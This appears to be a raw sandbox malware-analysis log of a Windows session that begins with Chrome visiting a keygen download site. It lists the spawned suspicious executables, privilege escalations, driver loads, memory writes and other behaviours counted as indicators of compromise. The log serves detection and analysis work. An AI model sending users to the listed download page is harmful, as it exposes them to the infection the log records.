NOTEPAD.EXEpid process 3964 NOTEPAD.EXE -
Runs ping.exe 1 TTPs 3 IoCs
Processes:
PING.EXEPING.EXEPING.EXEpid process 4164 PING.EXE 1868 PING.EXE 5816 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 3 IoCs
Processes:
lighteningplayer.exepid process 576 lighteningplayer.exe 3040 3040 -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
chrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exerundll32.exesvchost.exe5661775.exechrome.exechrome.exechrome.exeultramediaburner.tmpTugaeharuxae.exepid process 188 chrome.exe 188 chrome.exe 3680 chrome.exe 3680 chrome.exe 4580 chrome.exe 4580 chrome.exe 744 chrome.exe 744 chrome.exe 4780 chrome.exe 4780 chrome.exe 4232 chrome.exe 4232 chrome.exe 4292 chrome.exe 4292 chrome.exe 2272 chrome.exe 2272 chrome.exe 5036 chrome.exe 5036 chrome.exe 1996 chrome.exe 1996 chrome.exe 1996 chrome.exe 1996 chrome.exe 904 rundll32.exe 904 rundll32.exe 3328 svchost.exe 3328 svchost.exe 3328 svchost.exe 3328 svchost.exe 3672 5661775.exe 3672 5661775.exe 4612 chrome.exe 4612 chrome.exe 4380 chrome.exe 4380 chrome.exe 4796 chrome.exe 4796 chrome.exe 3972 ultramediaburner.tmp 3972 ultramediaburner.tmp 1288 Tugaeharuxae.exe 1288 Tugaeharuxae.exe 1288 Tugaeharuxae.exe 1288 Tugaeharuxae.exe 1288 Tugaeharuxae.exe 1288 Tugaeharuxae.exe 1288 Tugaeharuxae.exe 1288 Tugaeharuxae.exe 1288 Tugaeharuxae.exe 1288 Tugaeharuxae.exe 1288 Tugaeharuxae.exe 1288 Tugaeharuxae.exe 1288 Tugaeharuxae.exe 1288 Tugaeharuxae.exe 1288 Tugaeharuxae.exe 1288 Tugaeharuxae.exe 1288 Tugaeharuxae.exe 1288 Tugaeharuxae.exe 1288 Tugaeharuxae.exe 1288 Tugaeharuxae.exe 1288 Tugaeharuxae.exe 1288 Tugaeharuxae.exe 1288 Tugaeharuxae.exe 1288 Tugaeharuxae.exe 1288 Tugaeharuxae.exe 1288 Tugaeharuxae.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
lighteningplayer.exepid process 3040 576 lighteningplayer.exe -
Suspicious behavior: LoadsDriver 3 IoCs
Processes:
VNrgBLpid process 392 VNrgBL 392 VNrgBL 392 VNrgBL -
Suspicious behavior: MapViewOfSection 53 IoCs
Processes:
MicrosoftEdgeCP.exekabo.exetoolspab1.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exebwfiwcdtffiwcdpid process 5492 MicrosoftEdgeCP.exe 5492 MicrosoftEdgeCP.exe 5492 MicrosoftEdgeCP.exe 5020 kabo.exe 5492 MicrosoftEdgeCP.exe 5492 MicrosoftEdgeCP.exe 1008 toolspab1.exe 3040 3040 3040 3040 3040 3040 3040 3040 5916 explorer.exe 5916 explorer.exe 5916 explorer.exe 5916 explorer.exe 5916 explorer.exe 5916 explorer.exe 5916 explorer.exe 5916 explorer.exe 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 6100 explorer.exe 6100 explorer.exe 3040 3040 3040 3040 4732 explorer.exe 4732 explorer.exe 3040 3040 3040 3040 6532 explorer.exe 6532 explorer.exe 3040 3040 6380 bwfiwcd 6104 tffiwcd -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
rundll32.exesvchost.exeJoSetp.exetaskkill.exesvchost.exedescription pid process Token: SeDebugPrivilege 904 rundll32.exe Token: SeTcbPrivilege 3328 svchost.exe Token: SeDebugPrivilege 904 rundll32.exe Token: SeDebugPrivilege 904 rundll32.exe Token: SeDebugPrivilege 904 rundll32.exe Token: SeDebugPrivilege 904 rundll32.exe Token: SeDebugPrivilege 904 rundll32.exe Token: SeDebugPrivilege 904 rundll32.exe Token: SeDebugPrivilege 904 rundll32.exe Token: SeDebugPrivilege 904 rundll32.exe Token: SeDebugPrivilege 904 rundll32.exe Token: SeDebugPrivilege 904 rundll32.exe Token: SeDebugPrivilege 3784 JoSetp.exe Token: SeDebugPrivilege 904 rundll32.exe Token: SeDebugPrivilege 904 rundll32.exe Token: SeDebugPrivilege 4236 taskkill.exe Token: SeAssignPrimaryTokenPrivilege 2640 svchost.exe Token: SeIncreaseQuotaPrivilege 2640 svchost.exe Token: SeSecurityPrivilege 2640 svchost.exe Token: SeTakeOwnershipPrivilege 2640 svchost.exe Token: SeLoadDriverPrivilege 2640 svchost.exe Token: SeSystemtimePrivilege 2640 svchost.exe Token: SeBackupPrivilege 2640 svchost.exe Token: SeRestorePrivilege 2640 svchost.exe Token: SeShutdownPrivilege 2640 svchost.exe Token: SeSystemEnvironmentPrivilege 2640 svchost.exe Token: SeUndockPrivilege 2640 svchost.exe Token: SeManageVolumePrivilege 2640 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2640 svchost.exe Token: SeIncreaseQuotaPrivilege 2640 svchost.exe Token: SeSecurityPrivilege 2640 svchost.exe Token: SeTakeOwnershipPrivilege 2640 svchost.exe Token: SeLoadDriverPrivilege 2640 svchost.exe Token: SeSystemtimePrivilege 2640 svchost.exe Token: SeBackupPrivilege 2640 svchost.exe Token: SeRestorePrivilege 2640 svchost.exe Token: SeShutdownPrivilege 2640 svchost.exe Token: SeSystemEnvironmentPrivilege 2640 svchost.exe Token: SeUndockPrivilege 2640 svchost.exe Token: SeManageVolumePrivilege 2640 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2640 svchost.exe Token: SeIncreaseQuotaPrivilege 2640 svchost.exe Token: SeSecurityPrivilege 2640 svchost.exe Token: SeTakeOwnershipPrivilege 2640 svchost.exe Token: SeLoadDriverPrivilege 2640 svchost.exe Token: SeSystemtimePrivilege 2640 svchost.exe Token: SeBackupPrivilege 2640 svchost.exe Token: SeRestorePrivilege 2640 svchost.exe Token: SeShutdownPrivilege 2640 svchost.exe Token: SeSystemEnvironmentPrivilege 2640 svchost.exe Token: SeUndockPrivilege 2640 svchost.exe Token: SeManageVolumePrivilege 2640 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2640 svchost.exe Token: SeIncreaseQuotaPrivilege 2640 svchost.exe Token: SeSecurityPrivilege 2640 svchost.exe Token: SeTakeOwnershipPrivilege 2640 svchost.exe Token: SeLoadDriverPrivilege 2640 svchost.exe Token: SeSystemtimePrivilege 2640 svchost.exe Token: SeBackupPrivilege 2640 svchost.exe Token: SeRestorePrivilege 2640 svchost.exe Token: SeShutdownPrivilege 2640 svchost.exe Token: SeSystemEnvironmentPrivilege 2640 svchost.exe Token: SeUndockPrivilege 2640 svchost.exe Token: SeManageVolumePrivilege 2640 svchost.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
Processes:
chrome.exechrome.exeultramediaburner.tmpirecord.tmp7zG.exe7zG.exelighteningplayer.exepid process 3680 chrome.exe 3680 chrome.exe 3680 chrome.exe 3680 chrome.exe 3680 chrome.exe 3680 chrome.exe 3680 chrome.exe 3680 chrome.exe 3680 chrome.exe 3680 chrome.exe 3680 chrome.exe 3680 chrome.exe 3680 chrome.exe 3680 chrome.exe 4380 chrome.exe 4380 chrome.exe 3972 ultramediaburner.tmp 5724 irecord.tmp 2140 7zG.exe 6972 7zG.exe 576 lighteningplayer.exe 3040 3040 576 lighteningplayer.exe 576 lighteningplayer.exe -
Suspicious use of SendNotifyMessage 52 IoCs
Processes:
lighteningplayer.exepid process 576 lighteningplayer.exe 576 lighteningplayer.exe 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 -
Suspicious use of SetWindowsHookEx 35 IoCs
Processes:
PING.EXEMicrosoftEdge.exeMicrosoftEdgeCP.exegoogle-game.exeCredentialUIBroker.exe8533.exe8831.exelighteningplayer.exeOpenWith.exe8533.exe8831.exepid process 1868 PING.EXE 1868 PING.EXE 1484 MicrosoftEdge.exe 5492 MicrosoftEdgeCP.exe 5492 MicrosoftEdgeCP.exe 6248 google-game.exe 6248 google-game.exe 7028 CredentialUIBroker.exe 5988 8533.exe 6712 8831.exe 3040 3040 3040 3040 3040 3040 3040 576 lighteningplayer.exe 3040 3040 3040 3040 184 OpenWith.exe 3040 3040 3040 3040 3040 6384 8533.exe 4128 8831.exe 3040 3040 3040 3040 3040 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
chrome.exedescription pid process target process PID 3680 wrote to memory of 804 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 804 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 3996 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 3996 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 3996 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 3996 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 3996 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 3996 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 3996 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 3996 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 3996 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 3996 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 3996 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 3996 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 3996 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 3996 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 3996 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 3996 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 3996 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 3996 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 3996 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 3996 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 3996 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 3996 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 3996 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 3996 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 3996 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 3996 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 3996 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 3996 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 3996 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 3996 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 3996 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 3996 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 3996 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 3996 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 3996 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 3996 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 3996 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 3996 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 3996 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 3996 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 188 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 188 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 404 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 404 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 404 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 404 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 404 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 404 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 404 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 404 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 404 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 404 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 404 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 404 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 404 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 404 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 404 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 404 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 404 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 404 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 404 3680 chrome.exe chrome.exe PID 3680 wrote to memory of 404 3680 chrome.exe chrome.exe
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenit.com/d/8550ceeb125094q2480.html1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0x8,0xd4,0x7ff88dbc4f50,0x7ff88dbc4f60,0x7ff88dbc4f702⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1576 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1624 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1940 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2784 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2792 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3528 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4880 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3552 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5960 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5892 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5956 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6204 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6212 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6360 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6092 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6892 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4956 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings2⤵
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x240,0x244,0x248,0x23c,0x218,0x7ff76f17a890,0x7ff76f17a8a0,0x7ff76f17a8b03⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6748 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6708 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6596 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6176 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6148 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6000 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6116 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6300 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6780 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6820 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6480 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4932 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6828 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6864 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6264 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3656 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6316 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3888 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4248 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6304 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4188 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5056 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6548 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3660 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,8776544975808439511,2447429436737962120,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6140 /prefetch:82⤵
-
